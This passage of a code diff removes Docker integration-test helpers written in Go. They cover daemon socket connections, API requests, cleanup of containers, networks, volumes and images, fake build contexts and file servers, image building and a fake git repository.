-	basesizeFloat, err := strconv.ParseFloat(strings.Trim(basesize, " "), 64)
-	if err != nil {
-		return 0, err
-	}
-	return int64(basesizeFloat) * 1024 * 1024 * 1024, nil
-}
-
-func daemonHost() string {
-	daemonURLStr := "unix://" + opts.DefaultUnixSocket
-	if daemonHostVar := os.Getenv("DOCKER_HOST"); daemonHostVar != "" {
-		daemonURLStr = daemonHostVar
-	}
-	return daemonURLStr
-}
-
-func getTLSConfig() (*tls.Config, error) {
-	dockerCertPath := os.Getenv("DOCKER_CERT_PATH")
-
-	if dockerCertPath == "" {
-		return nil, fmt.Errorf("DOCKER_TLS_VERIFY specified, but no DOCKER_CERT_PATH environment variable")
-	}
-
-	option := &tlsconfig.Options{
-		CAFile:   filepath.Join(dockerCertPath, "ca.pem"),
-		CertFile: filepath.Join(dockerCertPath, "cert.pem"),
-		KeyFile:  filepath.Join(dockerCertPath, "key.pem"),
-	}
-	tlsConfig, err := tlsconfig.Client(*option)
-	if err != nil {
-		return nil, err
-	}
-
-	return tlsConfig, nil
-}
-
-func sockConn(timeout time.Duration, daemon string) (net.Conn, error) {
-	if daemon == "" {
-		daemon = daemonHost()
-	}
-	daemonURL, err := url.Parse(daemon)
-	if err != nil {
-		return nil, fmt.Errorf("could not parse url %q: %v", daemon, err)
-	}
-
-	var c net.Conn
-	switch daemonURL.Scheme {
-	case "npipe":
-		return npipeDial(daemonURL.Path, timeout)
-	case "unix":
-		return net.DialTimeout(daemonURL.Scheme, daemonURL.Path, timeout)
-	case "tcp":
-		if os.Getenv("DOCKER_TLS_VERIFY") != "" {
-			// Setup the socket TLS configuration.
-			tlsConfig, err := getTLSConfig()
-			if err != nil {
-				return nil, err
-			}
-			dialer := &net.Dialer{Timeout: timeout}
-			return tls.DialWithDialer(dialer, daemonURL.Scheme, daemonURL.Host, tlsConfig)
-		}
-		return net.DialTimeout(daemonURL.Scheme, daemonURL.Host, timeout)
-	default:
-		return c, fmt.Errorf("unknown scheme %v (%s)", daemonURL.Scheme, daemon)
-	}
-}
-
-func sockRequest(method, endpoint string, data interface{}) (int, []byte, error) {
-	jsonData := bytes.NewBuffer(nil)
-	if err := json.NewEncoder(jsonData).Encode(data); err != nil {
-		return -1, nil, err
-	}
-
-	res, body, err := sockRequestRaw(method, endpoint, jsonData, "application/json")
-	if err != nil {
-		return -1, nil, err
-	}
-	b, err := readBody(body)
-	return res.StatusCode, b, err
-}
-
-func sockRequestRaw(method, endpoint string, data io.Reader, ct string) (*http.Response, io.ReadCloser, error) {
-	return sockRequestRawToDaemon(method, endpoint, data, ct, "")
-}
-
-func sockRequestRawToDaemon(method, endpoint string, data io.Reader, ct, daemon string) (*http.Response, io.ReadCloser, error) {
-	req, client, err := newRequestClient(method, endpoint, data, ct, daemon)
-	if err != nil {
-		return nil, nil, err
-	}
-
-	resp, err := client.Do(req)
-	if err != nil {
-		client.Close()
-		return nil, nil, err
-	}
-	body := ioutils.NewReadCloserWrapper(resp.Body, func() error {
-		defer resp.Body.Close()
-		return client.Close()
-	})
-
-	return resp, body, nil
-}
-
-func sockRequestHijack(method, endpoint string, data io.Reader, ct string) (net.Conn, *bufio.Reader, error) {
-	req, client, err := newRequestClient(method, endpoint, data, ct, "")
-	if err != nil {
-		return nil, nil, err
-	}
-
-	client.Do(req)
-	conn, br := client.Hijack()
-	return conn, br, nil
-}
-
-func newRequestClient(method, endpoint string, data io.Reader, ct, daemon string) (*http.Request, *httputil.ClientConn, error) {
-	c, err := sockConn(time.Duration(10*time.Second), daemon)
-	if err != nil {
-		return nil, nil, fmt.Errorf("could not dial docker daemon: %v", err)
-	}
-
-	client := httputil.NewClientConn(c, nil)
-
-	req, err := http.NewRequest(method, endpoint, data)
-	if err != nil {
-		client.Close()
-		return nil, nil, fmt.Errorf("could not create new request: %v", err)
-	}
-
-	if ct != "" {
-		req.Header.Set("Content-Type", ct)
-	}
-	return req, client, nil
-}
-
-func readBody(b io.ReadCloser) ([]byte, error) {
-	defer b.Close()
-	return ioutil.ReadAll(b)
-}
-
-func deleteContainer(container ...string) error {
-	result := icmd.RunCommand(dockerBinary, append([]string{"rm", "-fv"}, container...)...)
-	return result.Compare(icmd.Success)
-}
-
-func getAllContainers() (string, error) {
-	getContainersCmd := exec.Command(dockerBinary, "ps", "-q", "-a")
-	out, exitCode, err := runCommandWithOutput(getContainersCmd)
-	if exitCode != 0 && err == nil {
-		err = fmt.Errorf("failed to get a list of containers: %v\n", out)
-	}
-
-	return out, err
-}
-
-func deleteAllContainers() error {
-	containers, err := getAllContainers()
-	if err != nil {
-		fmt.Println(containers)
-		return err
-	}
-	if containers == "" {
-		return nil
-	}
-
-	err = deleteContainer(strings.Split(strings.TrimSpace(containers), "\n")...)
-	if err != nil {
-		fmt.Println(err.Error())
-	}
-	return err
-}
-
-func deleteAllNetworks() error {
-	networks, err := getAllNetworks()
-	if err != nil {
-		return err
-	}
-	var errors []string
-	for _, n := range networks {
-		if n.Name == "bridge" || n.Name == "none" || n.Name == "host" {
-			continue
-		}
-		if daemonPlatform == "windows" && strings.ToLower(n.Name) == "nat" {
-			// nat is a pre-defined network on Windows and cannot be removed
-			continue
-		}
-		status, b, err := sockRequest("DELETE", "/networks/"+n.Name, nil)
-		if err != nil {
-			errors = append(errors, err.Error())
-			continue
-		}
-		if status != http.StatusNoContent {
-			errors = append(errors, fmt.Sprintf("error deleting network %s: %s", n.Name, string(b)))
-		}
-	}
-	if len(errors) > 0 {
-		return fmt.Errorf(strings.Join(errors, "\n"))
-	}
-	return nil
-}
-
-func getAllNetworks() ([]types.NetworkResource, error) {
-	var networks []types.NetworkResource
-	_, b, err := sockRequest("GET", "/networks", nil)
-	if err != nil {
-		return nil, err
-	}
-	if err := json.Unmarshal(b, &networks); err != nil {
-		return nil, err
-	}
-	return networks, nil
-}
-
-func deleteAllPlugins() error {
-	plugins, err := getAllPlugins()
-	if err != nil {
-		return err
-	}
-	var errors []string
-	for _, p := range plugins {
-		status, b, err := sockRequest("DELETE", "/plugins/"+p.Name+"?force=1", nil)
-		if err != nil {
-			errors = append(errors, err.Error())
-			continue
-		}
-		if status != http.StatusNoContent {
-			errors = append(errors, fmt.Sprintf("error deleting plugin %s: %s", p.Name, string(b)))
-		}
-	}
-	if len(errors) > 0 {
-		return fmt.Errorf(strings.Join(errors, "\n"))
-	}
-	return nil
-}
-
-func getAllPlugins() (types.PluginsListResponse, error) {
-	var plugins types.PluginsListResponse
-	_, b, err := sockRequest("GET", "/plugins", nil)
-	if err != nil {
-		return nil, err
-	}
-	if err := json.Unmarshal(b, &plugins); err != nil {
-		return nil, err
-	}
-	return plugins, nil
-}
-
-func deleteAllVolumes() error {
-	volumes, err := getAllVolumes()
-	if err != nil {
-		return err
-	}
-	var errors []string
-	for _, v := range volumes {
-		status, b, err := sockRequest("DELETE", "/volumes/"+v.Name, nil)
-		if err != nil {
-			errors = append(errors, err.Error())
-			continue
-		}
-		if status != http.StatusNoContent {
-			errors = append(errors, fmt.Sprintf("error deleting volume %s: %s", v.Name, string(b)))
-		}
-	}
-	if len(errors) > 0 {
-		return fmt.Errorf(strings.Join(errors, "\n"))
-	}
-	return nil
-}
-
-func getAllVolumes() ([]*types.Volume, error) {
-	var volumes volumetypes.VolumesListOKBody
-	_, b, err := sockRequest("GET", "/volumes", nil)
-	if err != nil {
-		return nil, err
-	}
-	if err := json.Unmarshal(b, &volumes); err != nil {
-		return nil, err
-	}
-	return volumes.Volumes, nil
-}
-
-var protectedImages = map[string]struct{}{}
-
-func deleteAllImages() error {
-	cmd := exec.Command(dockerBinary, "images")
-	cmd.Env = appendBaseEnv(true)
-	out, err := cmd.CombinedOutput()
-	if err != nil {
-		return err
-	}
-	lines := strings.Split(string(out), "\n")[1:]
-	var imgs []string
-	for _, l := range lines {
-		if l == "" {
-			continue
-		}
-		fields := strings.Fields(l)
-		imgTag := fields[0] + ":" + fields[1]
-		if _, ok := protectedImages[imgTag]; !ok {
-			if fields[0] == "<none>" {
-				imgs = append(imgs, fields[2])
-				continue
-			}
-			imgs = append(imgs, imgTag)
-		}
-	}
-	if len(imgs) == 0 {
-		return nil
-	}
-	args := append([]string{"rmi", "-f"}, imgs...)
-	if err := exec.Command(dockerBinary, args...).Run(); err != nil {
-		return err
-	}
-	return nil
-}
-
-func getPausedContainers() (string, error) {
-	getPausedContainersCmd := exec.Command(dockerBinary, "ps", "-f", "status=paused", "-q", "-a")
-	out, exitCode, err := runCommandWithOutput(getPausedContainersCmd)
-	if exitCode != 0 && err == nil {
-		err = fmt.Errorf("failed to get a list of paused containers: %v\n", out)
-	}
-
-	return out, err
-}
-
-func getSliceOfPausedContainers() ([]string, error) {
-	out, err := getPausedContainers()
-	if err == nil {
-		if len(out) == 0 {
-			return nil, err
-		}
-		slice := strings.Split(strings.TrimSpace(out), "\n")
-		return slice, err
-	}
-	return []string{out}, err
-}
-
-func unpauseContainer(container string) error {
-	return icmd.RunCommand(dockerBinary, "unpause", container).Error
-}
-
-func unpauseAllContainers() error {
-	containers, err := getPausedContainers()
-	if err != nil {
-		fmt.Println(containers)
-		return err
-	}
-
-	containers = strings.Replace(containers, "\n", " ", -1)
-	containers = strings.Trim(containers, " ")
-	containerList := strings.Split(containers, " ")
-
-	for _, value := range containerList {
-		if err = unpauseContainer(value); err != nil {
-			return err
-		}
-	}
-
-	return nil
-}
-
-func deleteImages(images ...string) error {
-	args := []string{dockerBinary, "rmi", "-f"}
-	return icmd.RunCmd(icmd.Cmd{Command: append(args, images...)}).Error
-}
-
-func imageExists(image string) error {
-	return icmd.RunCommand(dockerBinary, "inspect", image).Error
-}
-
-func pullImageIfNotExist(image string) error {
-	if err := imageExists(image); err != nil {
-		pullCmd := exec.Command(dockerBinary, "pull", image)
-		_, exitCode, err := runCommandWithOutput(pullCmd)
-
-		if err != nil || exitCode != 0 {
-			return fmt.Errorf("image %q wasn't found locally and it couldn't be pulled: %s", image, err)
-		}
-	}
-	return nil
-}
-
-func dockerCmdWithError(args ...string) (string, int, error) {
-	if err := validateArgs(args...); err != nil {
-		return "", 0, err
-	}
-	result := icmd.RunCommand(dockerBinary, args...)
-	if result.Error != nil {
-		return result.Combined(), result.ExitCode, result.Compare(icmd.Success)
-	}
-	return result.Combined(), result.ExitCode, result.Error
-}
-
-func dockerCmdWithStdoutStderr(c *check.C, args ...string) (string, string, int) {
-	if err := validateArgs(args...); err != nil {
-		c.Fatalf(err.Error())
-	}
-
-	result := icmd.RunCommand(dockerBinary, args...)
-	// TODO: why is c ever nil?
-	if c != nil {
-		c.Assert(result, icmd.Matches, icmd.Success)
-	}
-	return result.Stdout(), result.Stderr(), result.ExitCode
-}
-
-func dockerCmd(c *check.C, args ...string) (string, int) {
-	if err := validateArgs(args...); err != nil {
-		c.Fatalf(err.Error())
-	}
-	result := icmd.RunCommand(dockerBinary, args...)
-	c.Assert(result, icmd.Matches, icmd.Success)
-	return result.Combined(), result.ExitCode
-}
-
-func dockerCmdWithResult(args ...string) *icmd.Result {
-	return icmd.RunCommand(dockerBinary, args...)
-}
-
-func binaryWithArgs(args ...string) []string {
-	return append([]string{dockerBinary}, args...)
-}
-
-// execute a docker command with a timeout
-func dockerCmdWithTimeout(timeout time.Duration, args ...string) *icmd.Result {
-	if err := validateArgs(args...); err != nil {
-		return &icmd.Result{Error: err}
-	}
-	return icmd.RunCmd(icmd.Cmd{Command: binaryWithArgs(args...), Timeout: timeout})
-}
-
-// execute a docker command in a directory
-func dockerCmdInDir(c *check.C, path string, args ...string) (string, int, error) {
-	if err := validateArgs(args...); err != nil {
-		c.Fatalf(err.Error())
-	}
-	result := icmd.RunCmd(icmd.Cmd{Command: binaryWithArgs(args...), Dir: path})
-	return result.Combined(), result.ExitCode, result.Error
-}
-
-// execute a docker command in a directory with a timeout
-func dockerCmdInDirWithTimeout(timeout time.Duration, path string, args ...string) *icmd.Result {
-	if err := validateArgs(args...); err != nil {
-		return &icmd.Result{Error: err}
-	}
-	return icmd.RunCmd(icmd.Cmd{
-		Command: binaryWithArgs(args...),
-		Timeout: timeout,
-		Dir:     path,
-	})
-}
-
-// validateArgs is a checker to ensure tests are not running commands which are
-// not supported on platforms. Specifically on Windows this is 'busybox top'.
-func validateArgs(args ...string) error {
-	if daemonPlatform != "windows" {
-		return nil
-	}
-	foundBusybox := -1
-	for key, value := range args {
-		if strings.ToLower(value) == "busybox" {
-			foundBusybox = key
-		}
-		if (foundBusybox != -1) && (key == foundBusybox+1) && (strings.ToLower(value) == "top") {
-			return errors.New("cannot use 'busybox top' in tests on Windows. Use runSleepingContainer()")
-		}
-	}
-	return nil
-}
-
-// find the State.ExitCode in container metadata
-func findContainerExitCode(c *check.C, name string, vargs ...string) string {
-	args := append(vargs, "inspect", "--format='{{ .State.ExitCode }} {{ .State.Error }}'", name)
-	cmd := exec.Command(dockerBinary, args...)
-	out, _, err := runCommandWithOutput(cmd)
-	if err != nil {
-		c.Fatal(err, out)
-	}
-	return out
-}
-
-func findContainerIP(c *check.C, id string, network string) string {
-	out, _ := dockerCmd(c, "inspect", fmt.Sprintf("--format='{{ .NetworkSettings.Networks.%s.IPAddress }}'", network), id)
-	return strings.Trim(out, " \r\n'")
-}
-
-func getContainerCount() (int, error) {
-	const containers = "Containers:"
-
-	cmd := exec.Command(dockerBinary, "info")
-	out, _, err := runCommandWithOutput(cmd)
-	if err != nil {
-		return 0, err
-	}
-
-	lines := strings.Split(out, "\n")
-	for _, line := range lines {
-		if strings.Contains(line, containers) {
-			output := strings.TrimSpace(line)
-			output = strings.TrimLeft(output, containers)
-			output = strings.Trim(output, " ")
-			containerCount, err := strconv.Atoi(output)
-			if err != nil {
-				return 0, err
-			}
-			return containerCount, nil
-		}
-	}
-	return 0, fmt.Errorf("couldn't find the Container count in the output")
-}
-
-// FakeContext creates directories that can be used as a build context
-type FakeContext struct {
-	Dir string
-}
-
-// Add a file at a path, creating directories where necessary
-func (f *FakeContext) Add(file, content string) error {
-	return f.addFile(file, []byte(content))
-}
-
-func (f *FakeContext) addFile(file string, content []byte) error {
-	fp := filepath.Join(f.Dir, filepath.FromSlash(file))
-	dirpath := filepath.Dir(fp)
-	if dirpath != "." {
-		if err := os.MkdirAll(dirpath, 0755); err != nil {
-			return err
-		}
-	}
-	return ioutil.WriteFile(fp, content, 0644)
-
-}
-
-// Delete a file at a path
-func (f *FakeContext) Delete(file string) error {
-	fp := filepath.Join(f.Dir, filepath.FromSlash(file))
-	return os.RemoveAll(fp)
-}
-
-// Close deletes the context
-func (f *FakeContext) Close() error {
-	return os.RemoveAll(f.Dir)
-}
-
-func fakeContextFromNewTempDir() (*FakeContext, error) {
-	tmp, err := ioutil.TempDir("", "fake-context")
-	if err != nil {
-		return nil, err
-	}
-	if err := os.Chmod(tmp, 0755); err != nil {
-		return nil, err
-	}
-	return fakeContextFromDir(tmp), nil
-}
-
-func fakeContextFromDir(dir string) *FakeContext {
-	return &FakeContext{dir}
-}
-
-func fakeContextWithFiles(files map[string]string) (*FakeContext, error) {
-	ctx, err := fakeContextFromNewTempDir()
-	if err != nil {
-		return nil, err
-	}
-	for file, content := range files {
-		if err := ctx.Add(file, content); err != nil {
-			ctx.Close()
-			return nil, err
-		}
-	}
-	return ctx, nil
-}
-
-func fakeContextAddDockerfile(ctx *FakeContext, dockerfile string) error {
-	if err := ctx.Add("Dockerfile", dockerfile); err != nil {
-		ctx.Close()
-		return err
-	}
-	return nil
-}
-
-func fakeContext(dockerfile string, files map[string]string) (*FakeContext, error) {
-	ctx, err := fakeContextWithFiles(files)
-	if err != nil {
-		return nil, err
-	}
-	if err := fakeContextAddDockerfile(ctx, dockerfile); err != nil {
-		return nil, err
-	}
-	return ctx, nil
-}
-
-// FakeStorage is a static file server. It might be running locally or remotely
-// on test host.
-type FakeStorage interface {
-	Close() error
-	URL() string
-	CtxDir() string
-}
-
-func fakeBinaryStorage(archives map[string]*bytes.Buffer) (FakeStorage, error) {
-	ctx, err := fakeContextFromNewTempDir()
-	if err != nil {
-		return nil, err
-	}
-	for name, content := range archives {
-		if err := ctx.addFile(name, content.Bytes()); err != nil {
-			return nil, err
-		}
-	}
-	return fakeStorageWithContext(ctx)
-}
-
-// fakeStorage returns either a local or remote (at daemon machine) file server
-func fakeStorage(files map[string]string) (FakeStorage, error) {
-	ctx, err := fakeContextWithFiles(files)
-	if err != nil {
-		return nil, err
-	}
-	return fakeStorageWithContext(ctx)
-}
-
-// fakeStorageWithContext returns either a local or remote (at daemon machine) file server
-func fakeStorageWithContext(ctx *FakeContext) (FakeStorage, error) {
-	if isLocalDaemon {
-		return newLocalFakeStorage(ctx)
-	}
-	return newRemoteFileServer(ctx)
-}
-
-// localFileStorage is a file storage on the running machine
-type localFileStorage struct {
-	*FakeContext
-	*httptest.Server
-}
-
-func (s *localFileStorage) URL() string {
-	return s.Server.URL
-}
-
-func (s *localFileStorage) CtxDir() string {
-	return s.FakeContext.Dir
-}
-
-func (s *localFileStorage) Close() error {
-	defer s.Server.Close()
-	return s.FakeContext.Close()
-}
-
-func newLocalFakeStorage(ctx *FakeContext) (*localFileStorage, error) {
-	handler := http.FileServer(http.Dir(ctx.Dir))
-	server := httptest.NewServer(handler)
-	return &localFileStorage{
-		FakeContext: ctx,
-		Server:      server,
-	}, nil
-}
-
-// remoteFileServer is a containerized static file server started on the remote
-// testing machine to be used in URL-accepting docker build functionality.
-type remoteFileServer struct {
-	host      string // hostname/port web server is listening to on docker host e.g. 0.0.0.0:43712
-	container string
-	image     string
-	ctx       *FakeContext
-}
-
-func (f *remoteFileServer) URL() string {
-	u := url.URL{
-		Scheme: "http",
-		Host:   f.host}
-	return u.String()
-}
-
-func (f *remoteFileServer) CtxDir() string {
-	return f.ctx.Dir
-}
-
-func (f *remoteFileServer) Close() error {
-	defer func() {
-		if f.ctx != nil {
-			f.ctx.Close()
-		}
-		if f.image != "" {
-			deleteImages(f.image)
-		}
-	}()
-	if f.container == "" {
-		return nil
-	}
-	return deleteContainer(f.container)
-}
-
-func newRemoteFileServer(ctx *FakeContext) (*remoteFileServer, error) {
-	var (
-		image     = fmt.Sprintf("fileserver-img-%s", strings.ToLower(stringutils.GenerateRandomAlphaOnlyString(10)))
-		container = fmt.Sprintf("fileserver-cnt-%s", strings.ToLower(stringutils.GenerateRandomAlphaOnlyString(10)))
-	)
-
-	if err := ensureHTTPServerImage(); err != nil {
-		return nil, err
-	}
-
-	// Build the image
-	if err := fakeContextAddDockerfile(ctx, `FROM httpserver
-COPY . /static`); err != nil {
-		return nil, fmt.Errorf("Cannot add Dockerfile to context: %v", err)
-	}
-	if _, err := buildImageFromContext(image, ctx, false); err != nil {
-		return nil, fmt.Errorf("failed building file storage container image: %v", err)
-	}
-
-	// Start the container
-	runCmd := exec.Command(dockerBinary, "run", "-d", "-P", "--name", container, image)
-	if out, ec, err := runCommandWithOutput(runCmd); err != nil {
-		return nil, fmt.Errorf("failed to start file storage container. ec=%v\nout=%s\nerr=%v", ec, out, err)
-	}
-
-	// Find out the system assigned port
-	out, _, err := runCommandWithOutput(exec.Command(dockerBinary, "port", container, "80/tcp"))
-	if err != nil {
-		return nil, fmt.Errorf("failed to find container port: err=%v\nout=%s", err, out)
-	}
-
-	fileserverHostPort := strings.Trim(out, "\n")
-	_, port, err := net.SplitHostPort(fileserverHostPort)
-	if err != nil {
-		return nil, fmt.Errorf("unable to parse file server host:port: %v", err)
-	}
-
-	dockerHostURL, err := url.Parse(daemonHost())
-	if err != nil {
-		return nil, fmt.Errorf("unable to parse daemon host URL: %v", err)
-	}
-
-	host, _, err := net.SplitHostPort(dockerHostURL.Host)
-	if err != nil {
-		return nil, fmt.Errorf("unable to parse docker daemon host:port: %v", err)
-	}
-
-	return &remoteFileServer{
-		container: container,
-		image:     image,
-		host:      fmt.Sprintf("%s:%s", host, port),
-		ctx:       ctx}, nil
-}
-
-func inspectFieldAndMarshall(c *check.C, name, field string, output interface{}) {
-	str := inspectFieldJSON(c, name, field)
-	err := json.Unmarshal([]byte(str), output)
-	if c != nil {
-		c.Assert(err, check.IsNil, check.Commentf("failed to unmarshal: %v", err))
-	}
-}
-
-func inspectFilter(name, filter string) (string, error) {
-	format := fmt.Sprintf("{{%s}}", filter)
-	inspectCmd := exec.Command(dockerBinary, "inspect", "-f", format, name)
-	out, exitCode, err := runCommandWithOutput(inspectCmd)
-	if err != nil || exitCode != 0 {
-		return "", fmt.Errorf("failed to inspect %s: %s", name, out)
-	}
-	return strings.TrimSpace(out), nil
-}
-
-func inspectFieldWithError(name, field string) (string, error) {
-	return inspectFilter(name, fmt.Sprintf(".%s", field))
-}
-
-func inspectField(c *check.C, name, field string) string {
-	out, err := inspectFilter(name, fmt.Sprintf(".%s", field))
-	if c != nil {
-		c.Assert(err, check.IsNil)
-	}
-	return out
-}
-
-func inspectFieldJSON(c *check.C, name, field string) string {
-	out, err := inspectFilter(name, fmt.Sprintf("json .%s", field))
-	if c != nil {
-		c.Assert(err, check.IsNil)
-	}
-	return out
-}
-
-func inspectFieldMap(c *check.C, name, path, field string) string {
-	out, err := inspectFilter(name, fmt.Sprintf("index .%s %q", path, field))
-	if c != nil {
-		c.Assert(err, check.IsNil)
-	}
-	return out
-}
-
-func inspectMountSourceField(name, destination string) (string, error) {
-	m, err := inspectMountPoint(name, destination)
-	if err != nil {
-		return "", err
-	}
-	return m.Source, nil
-}
-
-func inspectMountPoint(name, destination string) (types.MountPoint, error) {
-	out, err := inspectFilter(name, "json .Mounts")
-	if err != nil {
-		return types.MountPoint{}, err
-	}
-
-	return inspectMountPointJSON(out, destination)
-}
-
-var errMountNotFound = errors.New("mount point not found")
-
-func inspectMountPointJSON(j, destination string) (types.MountPoint, error) {
-	var mp []types.MountPoint
-	if err := json.Unmarshal([]byte(j), &mp); err != nil {
-		return types.MountPoint{}, err
-	}
-
-	var m *types.MountPoint
-	for _, c := range mp {
-		if c.Destination == destination {
-			m = &c
-			break
-		}
-	}
-
-	if m == nil {
-		return types.MountPoint{}, errMountNotFound
-	}
-
-	return *m, nil
-}
-
-func inspectImage(name, filter string) (string, error) {
-	args := []string{"inspect", "--type", "image"}
-	if filter != "" {
-		format := fmt.Sprintf("{{%s}}", filter)
-		args = append(args, "-f", format)
-	}
-	args = append(args, name)
-	inspectCmd := exec.Command(dockerBinary, args...)
-	out, exitCode, err := runCommandWithOutput(inspectCmd)
-	if err != nil || exitCode != 0 {
-		return "", fmt.Errorf("failed to inspect %s: %s", name, out)
-	}
-	return strings.TrimSpace(out), nil
-}
-
-func getIDByName(name string) (string, error) {
-	return inspectFieldWithError(name, "Id")
-}
-
-// getContainerState returns the exit code of the container
-// and true if it's running
-// the exit code should be ignored if it's running
-func getContainerState(c *check.C, id string) (int, bool, error) {
-	var (
-		exitStatus int
-		running    bool
-	)
-	out, exitCode := dockerCmd(c, "inspect", "--format={{.State.Running}} {{.State.ExitCode}}", id)
-	if exitCode != 0 {
-		return 0, false, fmt.Errorf("%q doesn't exist: %s", id, out)
-	}
-
-	out = strings.Trim(out, "\n")
-	splitOutput := strings.Split(out, " ")
-	if len(splitOutput) != 2 {
-		return 0, false, fmt.Errorf("failed to get container state: output is broken")
-	}
-	if splitOutput[0] == "true" {
-		running = true
-	}
-	if n, err := strconv.Atoi(splitOutput[1]); err == nil {
-		exitStatus = n
-	} else {
-		return 0, false, fmt.Errorf("failed to get container state: couldn't parse integer")
-	}
-
-	return exitStatus, running, nil
-}
-
-func buildImageCmd(name, dockerfile string, useCache bool, buildFlags ...string) *exec.Cmd {
-	return buildImageCmdWithHost(name, dockerfile, "", useCache, buildFlags...)
-}
-
-func buildImageCmdWithHost(name, dockerfile, host string, useCache bool, buildFlags ...string) *exec.Cmd {
-	args := []string{}
-	if host != "" {
-		args = append(args, "--host", host)
-	}
-	args = append(args, "build", "-t", name)
-	if !useCache {
-		args = append(args, "--no-cache")
-	}
-	args = append(args, buildFlags...)
-	args = append(args, "-")
-	buildCmd := exec.Command(dockerBinary, args...)
-	buildCmd.Stdin = strings.NewReader(dockerfile)
-	return buildCmd
-}
-
-func buildImageWithOut(name, dockerfile string, useCache bool, buildFlags ...string) (string, string, error) {
-	buildCmd := buildImageCmd(name, dockerfile, useCache, buildFlags...)
-	out, exitCode, err := runCommandWithOutput(buildCmd)
-	if err != nil || exitCode != 0 {
-		return "", out, fmt.Errorf("failed to build the image: %s", out)
-	}
-	id, err := getIDByName(name)
-	if err != nil {
-		return "", out, err
-	}
-	return id, out, nil
-}
-
-func buildImageWithStdoutStderr(name, dockerfile string, useCache bool, buildFlags ...string) (string, string, string, error) {
-	buildCmd := buildImageCmd(name, dockerfile, useCache, buildFlags...)
-	stdout, stderr, exitCode, err := runCommandWithStdoutStderr(buildCmd)
-	if err != nil || exitCode != 0 {
-		return "", stdout, stderr, fmt.Errorf("failed to build the image: %s", stdout)
-	}
-	id, err := getIDByName(name)
-	if err != nil {
-		return "", stdout, stderr, err
-	}
-	return id, stdout, stderr, nil
-}
-
-func buildImage(name, dockerfile string, useCache bool, buildFlags ...string) (string, error) {
-	id, _, err := buildImageWithOut(name, dockerfile, useCache, buildFlags...)
-	return id, err
-}
-
-func buildImageFromContext(name string, ctx *FakeContext, useCache bool, buildFlags ...string) (string, error) {
-	id, _, err := buildImageFromContextWithOut(name, ctx, useCache, buildFlags...)
-	if err != nil {
-		return "", err
-	}
-	return id, nil
-}
-
-func buildImageFromContextWithOut(name string, ctx *FakeContext, useCache bool, buildFlags ...string) (string, string, error) {
-	args := []string{"build", "-t", name}
-	if !useCache {
-		args = append(args, "--no-cache")
-	}
-	args = append(args, buildFlags...)
-	args = append(args, ".")
-	buildCmd := exec.Command(dockerBinary, args...)
-	buildCmd.Dir = ctx.Dir
-	out, exitCode, err := runCommandWithOutput(buildCmd)
-	if err != nil || exitCode != 0 {
-		return "", "", fmt.Errorf("failed to build the image: %s", out)
-	}
-	id, err := getIDByName(name)
-	if err != nil {
-		return "", "", err
-	}
-	return id, out, nil
-}
-
-func buildImageFromContextWithStdoutStderr(name string, ctx *FakeContext, useCache bool, buildFlags ...string) (string, string, string, error) {
-	args := []string{"build", "-t", name}
-	if !useCache {
-		args = append(args, "--no-cache")
-	}
-	args = append(args, buildFlags...)
-	args = append(args, ".")
-	buildCmd := exec.Command(dockerBinary, args...)
-	buildCmd.Dir = ctx.Dir
-
-	stdout, stderr, exitCode, err := runCommandWithStdoutStderr(buildCmd)
-	if err != nil || exitCode != 0 {
-		return "", stdout, stderr, fmt.Errorf("failed to build the image: %s", stdout)
-	}
-	id, err := getIDByName(name)
-	if err != nil {
-		return "", stdout, stderr, err
-	}
-	return id, stdout, stderr, nil
-}
-
-func buildImageFromGitWithStdoutStderr(name string, ctx *fakeGit, useCache bool, buildFlags ...string) (string, string, string, error) {
-	args := []string{"build", "-t", name}
-	if !useCache {
-		args = append(args, "--no-cache")
-	}
-	args = append(args, buildFlags...)
-	args = append(args, ctx.RepoURL)
-	buildCmd := exec.Command(dockerBinary, args...)
-
-	stdout, stderr, exitCode, err := runCommandWithStdoutStderr(buildCmd)
-	if err != nil || exitCode != 0 {
-		return "", stdout, stderr, fmt.Errorf("failed to build the image: %s", stdout)
-	}
-	id, err := getIDByName(name)
-	if err != nil {
-		return "", stdout, stderr, err
-	}
-	return id, stdout, stderr, nil
-}
-
-func buildImageFromPath(name, path string, useCache bool, buildFlags ...string) (string, error) {
-	args := []string{"build", "-t", name}
-	if !useCache {
-		args = append(args, "--no-cache")
-	}
-	args = append(args, buildFlags...)
-	args = append(args, path)
-	buildCmd := exec.Command(dockerBinary, args...)
-	out, exitCode, err := runCommandWithOutput(buildCmd)
-	if err != nil || exitCode != 0 {
-		return "", fmt.Errorf("failed to build the image: %s", out)
-	}
-	return getIDByName(name)
-}
-
-type gitServer interface {
-	URL() string
-	Close() error
-}
-
-type localGitServer struct {
-	*httptest.Server
-}
-
-func (r *localGitServer) Close() error {
-	r.Server.Close()
-	return nil
-}
-
-func (r *localGitServer) URL() string {
-	return r.Server.URL
-}
-
-type fakeGit struct {
-	root    string
-	server  gitServer
-	RepoURL string
-}
-
-func (g *fakeGit) Close() {
-	g.server.Close()
-	os.RemoveAll(g.root)
-}
-
-func newFakeGit(name string, files map[string]string, enforceLocalServer bool) (*fakeGit, error) {
-	ctx, err := fakeContextWithFiles(files)
-	if err != nil {
-		return nil, err
-	}
-	defer ctx.Close()
-	curdir, err := os.Getwd()
-	if err != nil {
-		return nil, err
-	}
-	defer os.Chdir(curdir)
-
-	if output, err := exec.Command("git", "init", ctx.Dir).CombinedOutput(); err != nil {
-		return nil, fmt.Errorf("error trying to init repo: %s (%s)", err, output)
-	}
-	err = os.Chdir(ctx.Dir)
-	if err != nil {
-		return nil, err
-	}
-	if output, err := exec.Command("git", "config", "user.name", "Fake User").CombinedOutput(); err != nil {
-		return nil, fmt.Errorf("error trying to set 'user.name': %s (%s)", err, output)
-	}
-	if output, err := exec.Command("git", "config", "user.email", "fake.user@example.com").CombinedOutput(); err != nil {
-		return nil, fmt.Errorf("error trying to set 'user.email': %s (%s)", err, output)
-	}
-	if output, err := exec.Command("git", "add", "*").CombinedOutput(); err != nil {
-		return nil, fmt.Errorf("error trying to add files to repo: %s (%s)", err, output)
-	}
-	if output, err := exec.Command("git", "commit", "-a", "-m", "Initial commit").CombinedOutput(); err != nil {
-		return nil, fmt.Errorf("error trying to commit to repo: %s (%s)", err, output)
-	}
-
-	root, err := ioutil.TempDir("", "docker-test-git-repo")
-	if err != nil {
-		return nil, err
-	}
-	repoPath := filepath.Join(root, name+".git")
-	if output, err := exec.Command("git", "clone", "--bare", ctx.Dir, repoPath).CombinedOutput(); err != nil {
-		os.RemoveAll(root)
-		return nil, fmt.Errorf("error trying to clone --bare: %s (%s)", err, output)
-	}
